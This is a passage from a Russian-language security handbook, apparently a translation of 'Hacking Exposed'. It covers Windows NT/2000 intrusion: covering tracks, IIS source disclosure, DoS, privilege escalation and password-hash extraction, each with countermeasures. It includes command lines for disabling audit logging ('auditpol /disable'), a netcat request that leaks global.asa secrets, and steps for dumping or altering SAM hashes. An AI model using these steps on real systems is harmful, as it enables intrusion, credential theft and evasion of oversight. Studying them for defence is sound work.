признать себя побежденным: создайте резервную копию важных данных (кроме двоичных файлов!), удалите все программное обеспечение и переустановите его с проверенных носителей. На полагайтесь на резервные копии, поскольку неизвестно, в какой момент взломщик получил контроль над системой, — вы можете восстановить тех же самых "троянских коней". D:\Toolbox>md5sum d:\test.txt > d:\test.md5 К сожалению, утилита MDSsum одновременно работает лишь с одним файлом (конечно, использование сценариев несколько смягчает это неудобство). Перенаправление исполняемых файлов, выполняемое набором "отмычек" системы NT/2000, теоретически может нейтрализовать подсчет контрольных сумм. Однако поскольку код при этом не изменяется, но в то же время "захватывается" и передается через другую программу, то такой прецедент все же можно выявить. Необходимо упомянуть еще несколько важных утилит, предназначенных для проверки содержимого двоичных файлов. К ним относится старая утилита UNIX strings, перенесенная на платформу Windows (также разработана компанией Cygnus), BinText от Робина Кейра и мощный редактор текста/ шестнадцатеричных данных UltraEdit32 для Windows, который можно найти по адресу http: //www.ultraedit.com. Мы считаем, что редактор BinText лучше всего поместить в папку SendTo, так чтобы его можно было активизировать при щелчке правой кнопкой мыши на имени файлов в проводнике Windows. Для этих же целей редактор UltraEdit32 помещает в контекстное меню соответствующую команду. net start _root_ В Windows 2000 появилось средство защиты файлов операционной системы (Windows File Protection), которое предотвращает перезапись системных файлов, установленных программой инсталляции Windows 2000 (для этого около 600 файлов хранится в папке %systemroot%). В последних сообщениях, появившихся в бюллетене NTBugtraq, содержится информация о том, что систему WFP можно обойти, особенно, если ранее были получены привилегии администратора. |
Сокрытие следов Как только злоумышленник получит права администратора, он, скорее всего, постарается скрыть факт своего присутствия в системе. Затем, получив всю интересующую его информацию, он создаст потайные ходы и примет все меры, чтобы спрятать установленные им утилиты. Если с обеими задачами он справится успешно, то подготовка и проведение повторной атаки займет у него гораздо меньше времени. |
Отключение аудита Если владелец взламываемой системы хоть немного беспокоится о безопасности, он обязательно включит режим аудита, о чем мы уже говорили выше в данной главе. Поскольку ведение журналов может снизить производительность интенсивно работающих серверов, особенно если регистрируются такие события, как, например, успешное выполнение функций управления пользователями и группами (флажок Success для события User and Group Management в диалоговом окне Audit Policy диспетчера пользователей), многие администраторы NT либо вообще не включают функций контроля, либо включают лишь некоторые из них. Однако первое, что делает злоумышленник, пытаясь получить привилегии администратора, проверяет, активизирован ли режим аудита, чтобы случайно не "засветиться". Утилита auditpol из набора NTRK позволяет управлять этим процессом. В следующем примере показано, как с помощью утилиты auditpol отключается режим аудита на удаленном компьютере. С:\> auditpol /disable Закончив работу, взломщик может снова включить режим аудита с помощью команды auditpol /enable. |
Очистка журнала регистрации событий Если деятельность, связанная с получением статуса администратора, оставила красноречивые следы в журнале регистрации событий системы NT, с помощью приложения просмотра событий взломщик может просто стереть все записи журнала. Для этого злоумышленнику достаточно запустить приложение Event Viewer на своем компьютере и подключиться к узлу, к которому он получил доступ. После выполнения аутентификации взломщик может открывать, читать и очищать журналы регистрации событий удаленного узла. При удалении уничтожаются все записи, кроме одной, которая сообщает о том, что журнал регистрации был очищен посторонним. Конечно, даже такого сообщения вполне достаточно, чтобы забить тревогу, но, к сожалению, в распоряжении злоумышленника имеются и другие способы. Например, он может найти файлы журналов в каталоге \winnt\system32 и отредактировать их вручную, хотя это не так-то просто, учитывая сложность синтаксиса журналов NT. |
Скрытие файлов Если злоумышленнику удастся сохранить на взломанной системе установленные им программы, это значительно облегчит его задачу при повторном проникновении. Но, с другой стороны, именно по наличию неизвестно откуда взявшихся программ системный администратор может судить о том, что компьютер был взломан. Таким образом, злоумышленнику нужно предпринять какие-то шаги, чтобы как можно лучше скрыть файлы, которые потребуется запустить при последующих атаках. attrib Самый простой способ сокрытия файлов состоит в том, чтобы после их копирования в выбранный каталог воспользоваться старой командой DOS attrib, как показано в следующем примере. Использование потоков в файлахМТРЗ Если на целевом узле используется файловая система NTFS, то для сокрытия файлов взломщик может воспользоваться еще одним приемом. Дело в том, что система NTFS поддерживает несколько потоков (stream) информации внутри файла. Система поддержки потоков в NTFS трактуется компанией Microsoft как "механизм добавления дополнительных атрибутов или информации к файлу без реструктуризации файловой системы". Например, потоки используются при включенном режиме совместимости NTFS с файловой системой Macintosh. Однако к этому же механизму можно прибегнуть и для сокрытия в потоках набора инструментов, установленных хакером. Контрмеры: поиск потоков Единственным надежным средством, с помощью которого можно обнаружить потоки в файлах NTFS, является утилита Streamfinder компании March Information Systems. Недавно ее приобрела компания Internet Security Systems (ISS), которая, по всей видимости, больше не будет распространять эту утилиту через европейский Web-узел. Копию утилиты Streamfinder можно получить по адресу http://www.hackingexposed.com. Еще одним хорошим средством выявления файловых потоков является утилита sf ind Ди-джея Гласера (JD Glaser). |
Резюме В этой главе мы рассмотрели настолько широкий спектр возможных атак Windows NT, что у многих читателей может сложиться ошибочное представление о недостаточно надежной системе защиты этой операционной системы. Если это так, значит, мы не справились со стоявшими перед нами задачами. В таком случае хотелось бы еще раз подчеркнуть, что удаленный взлом практически не имеет шансов на успех без привилегий администратора, а получить эти привилегии можно лишь некоторыми хорошо известными способами: путем подбора пароля, его перехвата из сетевого потока данных или с использованием методов социальной инженерии, примененных к доверчивым служащим.
|
Глава 6. УЯЗВИМОСТЬ WINDOWS 2000
|
Уязвимость WINDOWS 2000 Осенью 1999 года компания Microsoft открыла доступ через Internet к нескольким тестовым серверам с бета-версией операционной системы Windows 2000 Server на узле Windows2000test.com, предлагая всем желающим попытаться взломать этот программный продукт. Материал этой главы основывается на информации, изложенной в разделах главы 3, посвященных вопросам инвентаризации операционной системы Windows NT/2000, а также в главеб, поэтому настоятельно рекомендуем прочитать эти главы, прежде чем приступать к изучению настоящей главы. В процессе обсуждения будут отмечены многие новые возможности обеспечения безопасности, включенные в Windows 2000. Эта новая функциональность поможет системным администраторам избежать многих из описанных ниже проблем. |
Предварительный сбор данных Как упоминаюсь в главе 1, большинство злоумышленников стараются получить максимум информации, не обращаясь напрямую к интересующему их серверу. Основным источником для предварительного сбора информации является система доменных имен DNS (Domain Name System) — стандартный протокол Internet, обеспечивающий преобразование IP-адресов и осмысленных имен типа www.hackingexposed.com. Перенос зоны DNS Поскольку пространство имен активного каталога операционной системы Windows 2000 основывается на использовании системы доменных имен, компания Microsoft существенно обновила реализацию сервера DNS в Windows 2000 с целью обеспечения потребностей активного каталога. По умолчанию перенос зоны DNS возможен на любой удаленный узел, что является основным средством сбора предварительной информации. Более подробные сведения по этому вопросу содержатся в главе 3. Отключение переноса зоны К счастью, реализация системы DNS для Windows 2000 допускает простую возможность ограничения переноса зоны, как описано в главе 3. |
Сканирование Операционная система Windows 2000 прослушивает список портов, многие из которых не были задействованы в Windows NT 4 и появились лишь в этой версии операционной системы. В табл. 6.1 приводится список некоторых портов, прослушиваемых по умолчанию контроллером домена Windows 2000. Каждый из них является потенциальной точкой входа в систему. Список номеров портов TCP и UDP, используемых службами и программами компании Microsoft, можно найти в перечне ресурсов по адресу http://www.microsoft.com/windows2000/
Таблица 6.1. Список портов, прослушиваемых по умолчанию контроллером домена Windows 2000
Контрмеры: отключение служб и блокировка портов Наилучший способ предотвращения всевозможных атак — это блокировка доступа к этим службам как на уровне сети, так и на уровне отдельных компьютеров.
He забудьте прочитать раздел " Отключение служб NetBIOS/SMB в Windows 2000" ниже в этой главе. Проведенное авторами тестирование Windows 2000 показало, что установка фильтров TCP/IP не блокирует эхо-пакетов ICMP (протокол 1), даже если отключить все протоколы IP, кроме 6 (TCP) и 17 (UDP).
Фильтры IPSec Для установки фильтров на порты отдельных компьютеров лучше использовать фильтры протокола IPSec. Эти фильтры явились побочным результатом новой реализации протокола IPSec для Windows 2000 и были с успехом использованы командами разработчиков сетей Openhack и windows2000test.com. Фильтры IPSec обрабатывают пакеты в стеке сети и просто-напросто выбрасывают те из них, которые не удовлетворяют характеристикам фильтра. В отличие от фильтров TCP/IP фильтры IPSec можно применять к отдельным интерфейсам. Кроме того, они блокируют запросы ICMP (однако они не настолько "тонки", чтобы блокировать отдельные подтипы запросов ICMP, скажем, эхо, отклики на эхо-запросы, временные метки и т.д.). Для вступления в силу фильтров IPSec перезагрузка не требуется (хотя изменение параметров фильтров может привести к разрыву существующих соединений IPSec). Такие фильтры обеспечивают решение проблемы для сервера и неприменимы в качестве средства обеспечения функциональности брандмауэра для рабочих станций, поскольку подобно фильтрам TCP/IP они будут блокировать загрузку информации, инициированную даже допустимыми соединениями (если не будут открыты все порты с более высокими номерами). ipsecpol \\имя_компыотера -w REG -p "Web" -о Две последние команды создают политику IPSec под названием Web, включающую два правила фильтрации. Первое из них, BlockAll, блокирует все протоколы поступающих и исходящих сообщений для данного компьютера и всех других компьютеров, а второе, OkHTTP, разрешает трафик через порт 80 данного и всех остальных компьютеров. Если нужно разрешить использование утилиты ping, или других программ, работающих на базе протокола ICMP (чего мы настоятельно не рекомендуем делать без особой необходимости), то в политику Web можно включить такое правило. Таблица 6.2. Параметры утилиты ipsecpol, используемые для фильтрации трафика через компьютеры под управлением Windows 2000
Следует отметить, что фильтры IPSec не блокируют порт 500 (UDP) или, на контроллерах домена Win 2000, порт 88 (TCP/UDP), используемые для аутентификации IPSec (порт 88 применяется протоколом Kerberos, a 500 — для обмена ключами IKE (Internet Key Exchange)). Сервисный пакет Service Pack 1 включает новый параметр реестра, позволяющий закрыть порты Kerberos путем отмены привилегий для драйвера IPSec: HKLM\SYSTEM\CurrentControlSet\ Трафик IKE всегда был привилегированным, и параметры системного реестра на него не влияли. Если же этот параметр реестра принимает значение 1, то все "льготы" для протоколов Kerberos и RSVP отменяются по умолчанию. Автор высказывает благодарность Майклу Ховарду (Michael Howard) из группы обеспечения безопасности Windows 2000 за помощь в изучении команды ipsecpol и нового параметра системного реестра. Поскольку утилита ipsecpol использует синтаксис командной строки, с ней нужно обращаться очень осторожно. В рассмотренном выше примере предполагается, что список фильтров обрабатывается сверху вниз. Простое изменение порядка следования записей в списке может привести к неправильной работе фильтров. Кроме того, утилита не позволяет задать диапазон портов для источника или назначения. Так что несмотря на значительные улучшения, обеспечиваемые фильтрами IPSec по сравнению с фильтрами TCP/IP, с ними нужно обращаться очень аккуратно. Иначе желание блокировать порты так и останется лишь желанием. Отметим еще несколько особенностей, выявленных процессе интенсивного тестирования утилиты ipsecpol.
|
Инвентаризация В главе 3 было показано, как из операционной системы Windows NT 4.0 можно получить сведения об учетных записях, совместно используемых ресурсах и другую информацию. Было показано, что служба NetBIOS передает эти данные анонимным пользователям, проникающим в систему через злополучный нулевой сеанс. Там же было указано, что служба активных каталогов предоставляет эту информацию неаутентифицированным злоумышленникам. Здесь мы не будем снова описывать эти виды атак, однако отметим, что Windows 2000 обеспечивает некоторые новые возможности по решению проблем со службами NetBIOS и SMB. Отключение служб NetBIOS/SMB в Windows 2000 К счастью, можно отключить и порт 445, однако эта операция выполняется отдельно для каждого конкретного адаптера (подобно операции отключения порта 139 в NT 4). При этом сначала необходимо найти соответствующую вкладку (возможно, она переместилась в новое, никому неизвестное местоположение — еще один недостаток графического интерфейса). Теперь ее можно открыть с помощью аплета Network and Dial-up Connections, выбрав команду Advanced>Advanced Settings, как показано на следующем рисунке.
Порт TCP 139 будет отображаться в результате Сканирования портов даже после выполнения указанных действий. Однако этот порт больше не будет предоставлять информацию, связанную со службой NetBIOS. Если вы не отключаете протоколы NetBIOS/SMB, не забывайте установить значение параметра RestrictAnonymous. Теперь это можно сделать с помощью команды Administrative Tools>Local Security Policy (или Domain или Domain Controller>Local Policies>Security Options>No Access Without Explicit Anonymous Permissions. Эта команда эквивалентна установке в системном реестре Windows 2000 значения 2 для параметра RestictAnonymous. Некоторые возможные проблемы, связанные с установкой значения 2 для параметра RestictAnonymous описаны в базе знаний Knowledge Base по адресу http://eearch.support.micro8oft.com. (статья Q246261). Не забывайте, что ограничить доступ к данным протокола NetBIOS или SMB можно также с помощью фильтров IPSec. |
Проникновение Как будет видно из дальнейшего изложения, новая версия операционной системы Windows 2000 подвержена всем тем же типам удаленных атак, что и NT 4. |
Получение пароля NetBIOS или SMB Средства, подобные описанной в главе 5 утилите SMBGrind, пригодны также для получения паролей в системе Windows 2000. Если службы NetBIOS и SMB/CIFS включены, и клиент может использовать SMB-запросы, то пароли доступа к совместно используемым ресурсам являются самым уязвимым местом системы Windows 2000. Один из участников группы разработки серверного и клиентского программного обеспечения Samba (http://eamba.org) Люк Лейтон (Luke Leighton) неоднократно подчеркивал различие между NetBIOS и SMB. NetBIOS — это транспортный протокол, а 8MB — протокол совместного использования файлов, связанный с поддерживаемыми протоколом NBT (NetBIOS поверх TCP) именами типа ИМЯ_СЕРВЕРА#20. Подобно любому серверу общего назначения, такие серверы обмениваются информацией через порт TCP. Таким образом, протокол SMB взаимодействует с портом TCP 445 и не имеет ничего общего с NetBIOS. |
Получение хэш-кодов паролей Утилита перехвата пакетов SMB L0phtcrack, описанная в главе 5, по прежнему может эффективно перехватывать и взламывать хэш-коды диспетчера локальной сети LM и NTLM, передаваемые между клиентами нижнего уровня (NT 4 и Win9x) и сервером Windows 2000. Новая процедура регистрации по протоколу Kerberos предусматривает выполнение идентификации средствами NTLM, если на одном из концов соединения протокол Kerberos не поддерживается, что и происходит между клиентом Windows 2000 и сервером NT 4 или Win9x |
Атаки против IIS 5 По возрастающей популярности с атаками на протоколы NetBIOS или 8MB могут сравниться лишь многочисленные методологии атак на US (Internet Information Server), поскольку это единственная служба, обязательно присутствующая в подключенных к Internet системах под управлением NT/2000. Эта служба встроена в операционные системы семейства Windows 2000. По умолчанию сервер IIS 5.0 и службы Web доступны во всех серверных версиях. И хотя вопросы, связанные с хакингом в Web, будут более подробно рассмотрены в главе 15, мы не можем обойти своим вниманием атаку на Internet Information Server, широко обсуждаемую компьютерной общественностью перед самым выходом в свет этой книги. Проблема US "Translate: f" Проблема, связанная со вскрытием кода (showcode) не нова: она была свойственна и более ранним версиям Internet Information Server. Она получила название Translate: f и была описана Даниелем Дочкалом (Daniel Docekal) в бюллетене Bugtraq. Эта проблема является хорошим примером ситуации, когда взломщик направляет Web-серверу неожиданные данные и тем самым заставляет его выполнять неприемлемые в обычных условиях действия. Это классический вид атаки против протоколов обработки документов типа HTTP. GET/global.asa\ HTTP/1.0 Если путем конвейерной обработки текстовый файл с этой информацией направить (с помощью утилиты netcat) на уязвимый сервер IIS, то в командной строке отобразится содержимое файла /global, as a: D:\type trans.txtI nc -nw 192.168.234.41 80 Мы слегка модифицировали содержимое файла global.asa, чтобы продемонстрировать наиболее характерную информацию, которую может извлечь из него взлом-шик. К сожалению, на многие узлах до сих пор встраивают пароли приложений в ASP и ASA-файлы, повышая тем самым вероятность последующего проникновения хакеров в свои пенаты. Как видно из этого примера, взломщик, вскрывший содержимое файла global.asa, получает в свое распоряжение пароли многих серверов нижнего уровня, включая систему LDAP. Корни проблемы Translate: f - протокол WebDAV и канонизация При первом выявлении этой проблемы вокруг ее причин разгорелись бурные споры. Официальная позиция компании Microsoft сводилась к тому, что причиной является некорректное поведение внутреннего обработчика файлов в ядре US (что в прошлом действительно приводило к некоторым проблемам). Эта позиция была обнародована в разделе MSOO-58, посвященном вопросам безопасности по адресу http: //www.microsoft.com/technet/security/bulletin/fq00-058.asp. Контрмеры: решение для проблемы Translate: f Чтобы уменьшить риск, связанный с проблемой Translate: f и другими попытками вскрытия кода, достаточно просто иметь в виду, что любые исполняемые на сервере файлы могут быть видимы пользователям Internet и никогда не хранить в них секретную информацию. Неизвестно, связано ли это с участившимися попытками вскрытия кода, но компания Microsoft предлагает такой подход в качестве "обычной рекомендации по безопасности" в разделе FAQ MS00-58, уже упомянутом ранее. |
Удаленное переполнение буфера В главе 5, рассматривался вопрос переполнения буфера для системы Windows NT. В настоящее время выявлено несколько случаев переполнения буфера приложений, работающих под управлением NT/2000, но не самой операционной системы. |
Отказ в обслуживании Если большинство серьезных атак против операционной системы NT, направленных на генерацию состояния DoS (отказ в обслуживании), предотвращаются с помощью сервисного пакета NT 4 Service Pack 6a, то Win 2000 является сравнительно надежной в этом отношении операционной системой. До сих пор не было обнаружено никаких угроз возникновения условия DoS, даже после тестирования операционной системы на узле win2000test.com. Атака SYN и бомбардировка IP-пакетами Internet подтверждает известную истину: жизнь — это игра без правил. Особенно наглядно это проявилось в эксперименте с Win2000test.com, когда согласно правилам атаки DoS были категорически запрещены. Тем не менее, серверы этого узла подверглись массированным атакам IP-пакетами, количество которых значительно превысило возможности серверов по их обработке, а также хорошо известным атакам SYN, приводящим к переполнению очередей в стеке протокола TCP/IP (более подробная информация о специфике этих атак содержится в главе 15). Контрмеры против атак DoS Чтобы минимизировать ущерб от подобных атак, необходимо соответствующим образом настроить сетевые шлюзы или брандмауэры (более подробная информация содержится в главе 12). Однако еще раз повторим, что целесообразно также противостоять таким атакам на уровне отдельных компьютеров. Это сыграет свою роль, если одна из линий обороны будет прорвана. Благодаря эксперименту с узлом Win2000test.com компания Microsoft смогла добавить в операционную систему Windows 2000 несколько новых ключей системного реестра, которые можно использовать для защиты стека протокола TCP/IP от атак DoS. В табл. 6.3 содержится информация о конфигурации параметров системного реестра на серверах win2000test.com (эта таблица создана на основе отчета компании Microsoft, посвященного результатам эксперимента и расположенного по адресу http://www.microsoft.com/security, а также личного общения авторов с группой разработчиков Win2000test. com). Некоторые из этих значений, например synAttackProtect=2, в некоторых случаях могут оказаться слишком жесткими. Они были выбраны для защиты сервера Internet с активным трафиком.
Таблица 6.3. Рекомендуемые параметры для стека протокола TCP/IP в операционной системе NT/2000, позволяющие предотвратить атаки DoS
Более подробная информация об этих параметрах и описание параметра SynAttackProtect содержится в статье Q142641 базы знаний компании Microsoft. Генерация состояния DoS сервера ч.,, Telnet Win 2000 Эта простая атака, придуманная в лаборатории SecureXpertLabs (http://www. secure xpert com), предполагает отправку бинарной строки, состоящей из нулей, службе Telnet Microsoft (которая в Win 2000 по умолчанию отключена). Это приводит к выводу службы из строя и автоматическому перезапуску (если таковой предусмотрен). При многократном повторении попыток автоматического перезапуска (когда их число достигает максимально допустимого значения) служба отключается насовсем. Модуль обновления для сервера Telnet Для предотвращения этой атаки необходимо использовать модуль обновления, который можно найти по адресу http://www.microsoft.com/technet/security/ bulletin/MS00-050.asp. Он не включен в сервисный пакет Win 2000 Service Pack 1 и может применяться как до, так и после этого пакета. Сервер Telnet можно сконфигурировать на выполнение автоматической перезагрузки. В этом случае постоянные нападки взломщиков, возможно, по-прежнему будут досаждать, однако теперь их можно отслеживать с помощью маршрутизатора, если поддерживаемый на нем журнал имеет достаточно большой размер и взломщики не используют ложные пакеты. Генерация состояния DoS на сервере имен NetBIOS В июле 2000 года сэр Дастик (Sir Dystic) из группы хакеров Cult of the Dead Caw ("Кутьт мертвой коровы", http://www.cultdeadcow.com) сообщил о том что отправка сообщения "NetBIOS Name Release" службе имен NetBIOS (NBNS UDP 137) компьютера NT/2000 приводит к конфликту, связанному с этим именем, и невозможности его дальнейшего использования. После получения такого сообщения это имя нельзя использовать в сети NetBIOS. Примерно в это же время из лаборатории Network Associates COVERT Labs (http //www.nai.com) сообщили, что сообщение "NetBIOS Name Conflict можно отправить службе имен NetBIOS даже в том случае, если целевой компьютер не находится в процессе регистрации своего имени NetBIOS. Это тоже приводит к конфликту и невозможности дальнейшего использования имени. Контрмеры против атаки DoS на сервер имен NetBIOS К сожалению, протокол NetBIOS не документирован, поэтому авторы не могут гарантировать надежность следующего рецепта. Компания Microsoft разработала ключ системного реестра, предотвращающего подтверждение сообщения Name Release со стороны сервера NBNS. Решение проблемы с сообщением "Name Conflict состоит в том что это сообщение обрабатывается только на этапе регистрации. Таким образом, компьютер остается уязвимым только в это время. Соответствующий модуль обновления и более подробная информация содержится по адресу http: //www.microsoft.com/ |
Расширение привилегий Если взломщик смог добраться до учетной записи пользователя в системе Windows 2000, то следующим его желанием станет получение исключительных привилегий — прав администратора. К счастью, операционная система Win 2000 является более устойчивой, чем ее предшественницы в смысле противостояния таким попыткам (по крайней мере угрозы типа getadmin и sechole ей теперь не страшны). Но к сожалению, если взломщик смог получить данные интерактивной учетной записи, то предотвратить возможность расширения его привилегий очень сложно (интерактивные учетные записи получили гораздо более широкое распространение с появлением терминального сервера Windows 2000, применяемого в целях удаленного управления и распределенной обработки данных). Использование именованных конвейеров для запуска программ с системными привилегиями Атака, обеспечивающая расширение привилегий на основе прогнозирования создания именованного канала при инициализации системных служб Windows 2000 (таких как Server, Workstation, Alerter и ClipBook, связанных с учетной записью SYSTEM), была разработана Майком Шифманом (Mike Schiffman) и отправлена в бюллетень Bugtraq (ID 1535). Перед запуском каждой службы на сервере создается именованный канал с прогнозируемой последовательностью имен. Эту последовательность можно получить из параметра системного реестра HKLM\System\CurrentControlSet\Control\ ServiceCurrent. C:\>whoami /groups Обратите внимание, что эта программа взлома для выполнения своих губительных действий использует учетную запись SYSTEM. Теперь хакер может взломать пароль администратора и зарегистрироваться в системе. (Напомним, что при наличии системных привилегий это не составляет труда. Гораздо сложнее "пробраться" в группу администраторов.) Контрмеры против использования именованных каналов Компания Microsoft выпустила модуль обновления, изменяющий способ создания и размещения именованных каналов диспетчером Win 2000 Service Control Manager (SCM). Его можно найти по адресу http://www.microsoft.com/technet/security/ bulletin/MS00-053 .asp. Этот модуль обновления не вошел в сервисный пакет SP1 и может применяться как до, так и после установки этого пакета.
По умолчанию группа users и учетная запись Guest обладают правом локальной регистрации в системе Win 2000 Professional и на автономных серверах Win 2000 Server. Права пользователей контроллера домена ограничены более жестко благодаря специальной используемой по умолчанию политике (правами локальной регистрации обладают все группы операторов). Мы рекомендуем отменить это право для группы users и учетной записи Guest и строго следить за тем, кому предоставляются такие привилегии.
Нарушение доступа к рабочим станциям Большинство администраторов Windows никогда не слышали о рабочих станциях в контексте одного из наиболее загадочных разделов программирования для Windows. Модель безопасности Win 2000 определяет иерархию контейнеров, предназначенных для разграничения функций зашиты между различными процессами. В этой иерархии объекты упорядочены от общего к частному: сеанс, рабочая станция, рабочий стол. При этом сеанс содержит одну или несколько рабочих станций, которые, в свою очередь, могут включать один или несколько рабочих столов. В рамках этой концепции сфера действия процессов ограничена рабочей станцией, а потоки одного процесса работают с одним или несколькими рабочими столами. Однако по каким-то причинам эта концепция не была реализована в исходной версии Win 2000. При некоторых условиях процесс с более низкими привилегиями, работающий на одном из рабочих столов, в рамках одного сеанса мог получать информацию от рабочего стола другой рабочей станции. Контрмеры против нарушения доступа к рабочим станциям Поскольку эта проблема связана с некорректной реализацией модели безопасности компанией Microsoft, то и в ее решении придется положиться на модуль обновления этой компании. Такой модуль, обеспечивающий корректное разделение процессов для различных рабочих столов, можно получить по адресу http://www.microsoft.com/technet/ |
Несанкционированное получение данных После получения статуса администратора взломщики обычно стараются получить всю информацию, которую можно будет использовать для последующих вторжений. |
Получение хэш-кодов паролей Win 2000 Хакеры будут счастливы узнать, что хэш-коды диспетчера локальной сети LanManager (LM) хранится в предлагаемом по умолчанию местоположении Win 2000 для обеспечения совместимости с клиентами других версий (отличными от Windows NT/2000). Это приводит к проблемам, описанным в главе 5, для устранения которых можно использовать предложенные там же решения. Однако, к небольшому разочарованию хакеров, благодаря некоторым новым свойствам Win 2000 и, в первую очередь, алгоритму шифрования SYSKEY, стандартные приемы взлома паролей теперь неприменимы. Однако, как будет видно из следующих разделов, не все обстоит так благополучно. Получение базы данных SAM На контроллерах доменов Win 2000 хэш-коды паролей хранятся в файле службы каталогов Active Directory (%windir%\NTDS\ntds .dit). При стандартной конфигурации этот файл занимает порядка 10 Мбайт и хранится в зашифрованном виде, поэтому взломщики вряд ли смогут заполучить его с целью последующего анализа. Фаил SAM в Win 2000 по умолчанию кодируется с использованием SYSKEY и восстанавливается с помощью средства pwdump2. Не забывайте очищать каталог Repair \RegBack Не оставляйте взломщикам никаких шансов — переносите файлы каталога Repair\RegBack на съемный диск или в другое безопасное место. А еще лучше — при запуске утилиты создания диска аварийного восстановления не выбирайте опцию архивации системного реестра. Загрузка хэш-кодов чо, с с помощью pwdump2 В операционной системе Win 2000 по умолчанию применяется кодировка SYSKEY (более подробная информация об этом содержится в разделе Q143475 базы знаний и в главе 5). Поэтому с помощью средства pwdump нельзя корректно расшифровать хэш-коды паролей из системного реестра Win 2000. Для решения этой задачи надо использовать pwdump2 (более подробно о pwdump, pwdump2, а также о том, почему для расшифровки SYSKEY не подходит pwdump, читайте в главе 5). Более того, для локальной загрузки хэш-кодов с контроллера домена требуется обновленная версия утилиты pwdump2 (доступная по адресу http://razor.bindview.com), поскольку теперь хранение паролей организовано на базе Active Directory, а не в соответствии с традиционными принципами файла SAM. Контрмеры против загрузки хэш-кодов с помощью pwdump2 Поскольку принципы подключения динамических библиотек в Windows не изменились, то против утилиты pwdump2 не существует никакой зашиты. Слабым утешением служит лишь тот факт, что эта утилита работает локально и для ее запуска требуются привилегии администратора. Если же хакеру удалось получить эти привилегии, то он сможет получить практически любую информацию о локальной системе (другой вопрос, как можно использовать данные SAM для новых атак). Добавление хэш-кодов в файл SAM с помощью chntpw Если хакер получил физический доступ к системе и у него достаточно времени для загрузки другой операционной системы, то он может реализовать сложную атаку, описанную Питером Нордалом-Хагеном (Fetter Nordahl-Hagen). В ряде статей, содержащихся на этом узле, Питер приводит поразительные факты. Например, по его словам, хэш-коды паролей можно добавить в файл SAM в автономном режиме и таким образом изменить пароль любого пользователя системы. Применение этих приемов может привести к повреждению файла SAM. Испытывайте их только на тестовых компьютерах с системой NT/2000 и будьте готовы к возможному отказу операционной системы. В частности, не выбирайте опцию Disable SYSKEY программы chntpw в Win 2000. По отзывам, это может привести к непредсказуемым результатам и даже необходимости полной переустановки системы. Описанный выше прием не позволяет изменять пароли пользователей на контроллере домена Win 2000, а относится лишь к изменению файлов SAM. Напомним, что на контроллере домена хэш-коды паролей хранятся в Active Directory, а не в файле SAM.
Контрмеры против chntpw Если хакеры могут получить неограниченный физический доступ к системе, то противостоять им практически невозможно. Одна из слабых контрмер состоит в такой настройке параметров, при которой требуется привлечение ключа SYSKEY при каждой загрузке. Этого можно добиться, установив режим защиты системного ключа паролем или хранения его на гибком диске (в главе 5 описаны три модели использования ключа SYSKEY). Тогда даже после изменения пароля администратора для загрузки системы хакер должен будет ввести пароль SYSKEY. Конечно же, с помощью программы chntpw хакер может полностью отключить системный ключ, но тогда он рискует вывести из строя операционную систему, если это Win 2000. Удаление пароля администратора, вместе с файлом SAM 25 июля 1999 года Джеймс Дж. Ерейс (James J. Grace) и Томас С.В. Бартлетт III (Thomas S. V. Bartlett III) опубликовали потрясающую статью о том, как удалить пароль администратора, загрузившись в другой операционной системе и удалив файл SAM http://www.deepquest.pf. Имея неограниченный физический доступ к компьютеру и средства для записи информации в разделы NTFS (например, утилиту NTFSDOS Pro, доступную по адресу http://www.sysinternals.com), с помощью этого средства можно легко обойти всю локальную систему зашиты NT/2000. Контроллеры доменов Win 2000 не пострадают от удаления файла SAM, поскольку на этих машинах хэш-коды паролей хранятся в Active Directory. Однако в указанной статье приводится механизм достижения аналогичного результата на контроллере домена, предполагающий установку второй копии Win 2000.
Предотвращение удаления файла SAM Как отмечалось выше на уровне операционной системы существует единственный способ противостояния такой атаке. он заключается в защите паролем системного ключа или установке режима его хранения на гибком диске. Еще один эффективный способ противодействия атакам в автономном режиме- обеспечить физическую защищенность серверов, отключив режим загрузки со съемных носителей или установив пароль BIOS. Авторы советуют использовать все эти механизмы. |
Шифрование файловой системы Одним из главных достижений Win 2000 в области безопасности является шифрование файловой системы. Средство EPS (Encrypting File System) — это система шифрования на основе открытого ключа, предназначенная для кодирования данных на диске в реальном времени и предотвращения несанкционированного доступа к ним. Компания Microsoft опубликовала статью, описывающую детали функционирования EPS (http://www.microsoft.com/windows200/ Применение EFS Систему EFS можно применять для шифрования любого файла или папки. Эту операцию можно выполнить в диалоговом окне свойств объекта с помощью кнопки Advanced во вкладке General. Кроме того, для шифрования и дешифрования файлов можно использовать утилиту командной строки cipher. Для получения справочной информации об этой программе введите команду cipher /?. Будьте внимательны при перемещении зашифрованных файлов. Хотя при использовании стандартных механизмов резервного копирования (например, ntbackup.exe) зашифрованные файлы копируются без модификации, при выполнении обычной операции копирования файлы расшифровываются. Если файл копируется в раздел с файловой системой, отличной от NTFS 5.0, то после копирования файлы окажутся расшифрованными. При копировании файла на удаленный компьютер с файловой системой NTFS 5.0 он будет зашифрован, однако не будет идентичен оригиналу, поскольку удаленная копия будет зашифрована с помощью другого ключа. Таким образом, шифрование файловой системы защищает файлы только при хранении на диске, а при перемещении файлов они расшифровываются.
Расшифровка ключа агента восстановления EFS Продолжим начатое ранее обсуждение статьи Джеймса Дж. Грейса (James J. Grace) и Томаса С.В. Бартлетта III (Thomas S. V. Bartlett III). Возможность изменения пароля учетной записи администратора может иметь гораздо более серьезные последствия, если учесть, что учетная запись Administrator по умолчанию является агентом восстановления ключа. Если зарегистрироваться в системе с пустым паролем администратора, то все зашифрованные системой EFS файлы будут декодированы, поскольку администратор может получить доступ к ключу кодирования файлов (а значит, и содержимому этих файлов) с помощью своего ключа восстановления. Делегирование прав агента восстановления не решает проблему На первый взгляд может показаться, что проблему легко решить, делегировав права агента восстановления другой учетной записи. На самом деле это не так. Джеймс Дж. Грейс (James J. Grace) и Томас С.В. Бартлетт III (Thomas S. V. Bartlett III) разработали средство для изменения пароля любой учетной записи, определенной как агент восстановления. Экспортирование ключей восстановления и их безопасное хранение В ответ на статью Джеймса Дж. Грейса (James J. Grace) и Томаса С.В. Бартлетта III (Thomas S. V. Bartlett III) компания Microsoft признала, что таким способом действительно можно обойти систему EFS, но в свое оправдание заявила, что для предотвращения этой атаки нужно правильно хранить ключ восстановления EFS (http://www. microsoft.com/technet/security/analefs.asp). Запустится мастер, после выполнения рекомендаций которого ключ восстановления будет экспортирован. Для резервного копирования ключа агента восстановления вместе с сертификатом необходимо экспортировать и закрытый ключ. При этом авторы рекомендуют использовать защиту паролем. Напомним, что при простом удалении сертификата агента восстановления из правой 